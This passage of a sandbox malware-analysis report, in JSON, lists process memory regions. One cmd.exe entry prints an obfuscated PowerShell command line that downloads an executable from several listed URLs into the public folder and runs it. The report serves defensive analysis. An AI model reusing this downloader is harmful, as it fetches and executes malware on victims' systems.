"type": "region", "version": 1 }, "end_va": 8791596765183, "entry_point": 8791595548672, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll", "id": "region_274", "name": "c2r64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll", "region_type": "memory_mapped_file", "start_va": 8791595548672, "timestamp": "00:00:10.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 8791596793856, "type": "region", "version": 1 }, "end_va": 8791597293567, "entry_point": 8791596793856, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream64.dll", "id": "region_275", "name": "appvisvstream64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll", "region_type": "memory_mapped_file", "start_va": 8791596793856, "timestamp": "00:00:10.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2318336, "start_va": 8791597318144, "type": "region", "version": 1 }, "end_va": 8791599636479, "entry_point": 8791597318144, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll", "id": "region_276", "name": "appvisvsubsystems64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll", "region_type": "memory_mapped_file", "start_va": 8791597318144, "timestamp": "00:00:10.721", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2039808, "start_va": 8791607607296, "type": "region", "version": 1 }, "end_va": 8791609647103, "entry_point": 8791607607296, "filename": "\\Windows\\System32\\msxml6.dll", "id": "region_277", "name": "msxml6.dll", "norm_filename": "c:\\windows\\system32\\msxml6.dll", "region_type": "memory_mapped_file", "start_va": 8791607607296, "timestamp": "00:00:10.731", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791610294272, "type": "region", "version": 1 }, "end_va": 8791610757119, "entry_point": 8791610294272, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_278", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 8791610294272, "timestamp": "00:00:10.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791616061440, "type": "region", "version": 1 }, "end_va": 8791616122879, "entry_point": 8791616061440, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll", "id": "region_279", "name": "msointl30.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll", "region_type": "memory_mapped_file", "start_va": 8791616061440, "timestamp": "00:00:10.752", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791621107712, "type": "region", "version": 1 }, "end_va": 8791621189631, "entry_point": 8791621107712, "filename": "\\Windows\\System32\\wbem\\wbemsvc.dll", "id": "region_280", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\system32\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 8791621107712, "timestamp": "00:00:10.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791624253440, "type": "region", "version": 1 }, "end_va": 8791624314879, "entry_point": 8791624253440, "filename": "\\Windows\\System32\\wbem\\wbemprox.dll", "id": "region_281", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\system32\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 8791624253440, "timestamp": "00:00:10.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 8791624318976, "type": "region", "version": 1 }, "end_va": 8791624478719, "entry_point": 8791624318976, "filename": "\\Windows\\System32\\ntdsapi.dll", "id": "region_282", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\system32\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 8791624318976, "timestamp": "00:00:10.778", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000437-addr_0x0000000004150000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_12", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 68485120, "type": "region", "version": 1 }, "end_va": 68612095, "entry_point": 0, "filename": null, "id": "region_437", "name": "private_0x0000000004150000", "norm_filename": null, "region_type": "private_memory", "start_va": 68485120, "timestamp": "00:00:13.972", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000439-addr_0x0000000004350000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_13", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 70582272, "type": "region", "version": 1 }, "end_va": 70709247, "entry_point": 0, "filename": null, "id": "region_439", "name": "private_0x0000000004350000", "norm_filename": null, "region_type": "private_memory", "start_va": 70582272, "timestamp": "00:00:13.974", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000443-addr_0x00000000027f0000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_14", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 41877504, "type": "region", "version": 1 }, "end_va": 41889791, "entry_point": 0, "filename": null, "id": "region_443", "name": "private_0x00000000027f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41877504, "timestamp": "00:00:15.220", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000445-addr_0x00000000030c0000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_15", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 51118080, "type": "region", "version": 1 }, "end_va": 51245055, "entry_point": 0, "filename": null, "id": "region_445", "name": "private_0x00000000030c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51118080, "timestamp": "00:00:15.221", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000455-addr_0x0000000004580000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_16", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 72876032, "type": "region", "version": 1 }, "end_va": 73003007, "entry_point": 0, "filename": null, "id": "region_455", "name": "private_0x0000000004580000", "norm_filename": null, "region_type": "private_memory", "start_va": 72876032, "timestamp": "00:00:15.323", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000460-addr_0x00000000027a0000-size_0x000000000000f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_17", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 61440, "start_va": 41549824, "type": "region", "version": 1 }, "end_va": 41611263, "entry_point": 0, "filename": null, "id": "region_460", "name": "private_0x00000000027a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41549824, "timestamp": "00:00:16.546", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000462-addr_0x0000000004100000-size_0x000000000001e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_18", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 122880, "start_va": 68157440, "type": "region", "version": 1 }, "end_va": 68280319, "entry_point": 0, "filename": null, "id": "region_462", "name": "private_0x0000000004100000", "norm_filename": null, "region_type": "private_memory", "start_va": 68157440, "timestamp": "00:00:16.546", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000463-addr_0x0000000004120000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_19", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 68288512, "type": "region", "version": 1 }, "end_va": 68415487, "entry_point": 0, "filename": null, "id": "region_463", "name": "private_0x0000000004120000", "norm_filename": null, "region_type": "private_memory", "start_va": 68288512, "timestamp": "00:00:16.546", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000464-addr_0x0000000004180000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_20", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 68681728, "type": "region", "version": 1 }, "end_va": 68808703, "entry_point": 0, "filename": null, "id": "region_464", "name": "private_0x0000000004180000", "norm_filename": null, "region_type": "private_memory", "start_va": 68681728, "timestamp": "00:00:16.547", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000467-addr_0x0000000004ee0000-size_0x0000000000021000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_21", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 135168, "start_va": 82706432, "type": "region", "version": 1 }, "end_va": 82841599, "entry_point": 0, "filename": null, "id": "region_467", "name": "private_0x0000000004ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 82706432, "timestamp": "00:00:16.548", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000468-addr_0x0000000004f10000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_22", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 82903040, "type": "region", "version": 1 }, "end_va": 83030015, "entry_point": 0, "filename": null, "id": "region_468", "name": "private_0x0000000004f10000", "norm_filename": null, "region_type": "private_memory", "start_va": 82903040, "timestamp": "00:00:16.548", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000469-addr_0x0000000004fc0000-size_0x000000000001e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_23", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 122880, "start_va": 83623936, "type": "region", "version": 1 }, "end_va": 83746815, "entry_point": 0, "filename": null, "id": "region_469", "name": "private_0x0000000004fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 83623936, "timestamp": "00:00:16.548", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000470-addr_0x0000000005110000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_24", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 85000192, "type": "region", "version": 1 }, "end_va": 85127167, "entry_point": 0, "filename": null, "id": "region_470", "name": "private_0x0000000005110000", "norm_filename": null, "region_type": "private_memory", "start_va": 85000192, "timestamp": "00:00:16.548", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000486-addr_0x000000000a4b0000-size_0x00000000004b2000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_25", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4923392, "start_va": 172687360, "type": "region", "version": 1 }, "end_va": 177610751, "entry_point": 0, "filename": null, "id": "region_486", "name": "private_0x000000000a4b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 172687360, "timestamp": "00:00:17.117", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! \".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) ", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_2", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000794-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_26", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_794", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:19.510", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000795-addr_0x0000000000150000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_27", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_795", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:00:19.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 364544, "start_va": 1240858624, "type": "region", "version": 1 }, "end_va": 1241223167, "entry_point": 1240858624, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_796", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1240858624, "timestamp": "00:00:19.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_797", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:19.517", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_798", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:19.518", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000799-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_28", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_799", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:19.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791785144320, "type": "region", "version": 1 }, "end_va": 8791785148415, "entry_point": 8791785144320, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_800", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791785144320, "timestamp": "00:00:19.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_801", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:00:19.521", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000802-addr_0x000007fffffdd000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_29", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_802", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:00:19.521", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000803-addr_0x000007fffffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_30", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_803", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:00:19.522", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_804", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:19.672", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_805", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:19.672", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000806-addr_0x0000000000270000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_31", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_806", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:00:19.672", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 1995988640, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_807", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1995898880, "timestamp": "00:00:19.672", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791751000064, "type": "region", "version": 1 }, "end_va": 8791751438335, "entry_point": 8791751012576, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_808", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791751000064, "timestamp": "00:00:19.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_809", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:19.793", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_810", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:19.793", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_811", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:19.793", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 1994957512, "filename": "\\Windows\\System32\\user32.dll", "id": "region_812", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1994850304, "timestamp": "00:00:19.793", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_813", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:19.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_814", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:19.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791616192512, "type": "region", "version": 1 }, "end_va": 8791616225279, "entry_point": 8791616192512, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_815", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 8791616192512, "timestamp": "00:00:19.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791752507392, "type": "region", "version": 1 }, "end_va": 8791752564735, "entry_point": 8791752511616, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_816", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791752507392, "timestamp": "00:00:19.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 